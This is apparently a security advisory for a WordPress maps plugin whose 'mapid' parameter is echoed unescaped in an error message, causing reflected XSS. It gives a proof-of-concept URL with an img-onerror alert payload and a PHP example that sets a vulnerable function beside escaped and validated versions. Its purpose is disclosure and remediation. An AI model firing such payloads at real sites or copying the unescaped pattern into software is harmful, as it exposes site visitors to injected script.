The plugin does not sanitise and escape the mapid parameter before outputting it back in the "Bad mapid" error message, leading to a Reflected Cross-Site Scripting issue.
https://example.com/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(/XSS/)%3E
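The pattern described above, shown beside a hardened form. This is an added example, not the plugin's code: the function names are hypothetical, and it assumes map IDs are positive integers and that the message is written into an HTML body context.

```php
<?php
// Added example; function names are hypothetical, not the plugin's own.

// Vulnerable pattern: the request value is echoed back unescaped.
function bad_mapid_message_vulnerable(string $mapid): string {
    return 'Bad mapid: ' . $mapid;
}

// Hardened: escape for the HTML context at output time.
// In WordPress the equivalent call is esc_html().
function bad_mapid_message_escaped(string $mapid): string {
    return 'Bad mapid: ' . htmlspecialchars($mapid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Defence in depth: validate on input. Assumes map IDs are positive integers
// (in WordPress, absint() is the usual helper). Returns null when invalid.
function parse_mapid(string $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Constructed input: the mapid value from the proof-of-concept URL, URL-decoded.
$raw = urldecode('--%3E%3Cimg%20src%20onerror=alert(/XSS/)%3E');

if (parse_mapid($raw) === null) {
    // Error path: the rejected value must never be interpolated unescaped.
    echo bad_mapid_message_vulnerable($raw), PHP_EOL; // markup reaches the browser intact
    echo bad_mapid_message_escaped($raw), PHP_EOL;    // angle brackets become entities, shown as text
}

// A well-formed ID passes validation and is returned as an integer.
var_dump(parse_mapid('42'));
```

Validation alone is not sufficient here, because the error message is produced exactly when validation fails; the escaping at output is what closes the issue.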
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-17 (about 1 year ago)
2022-01-17 (about 1 year ago)
2022-04-12 (about 9 months ago)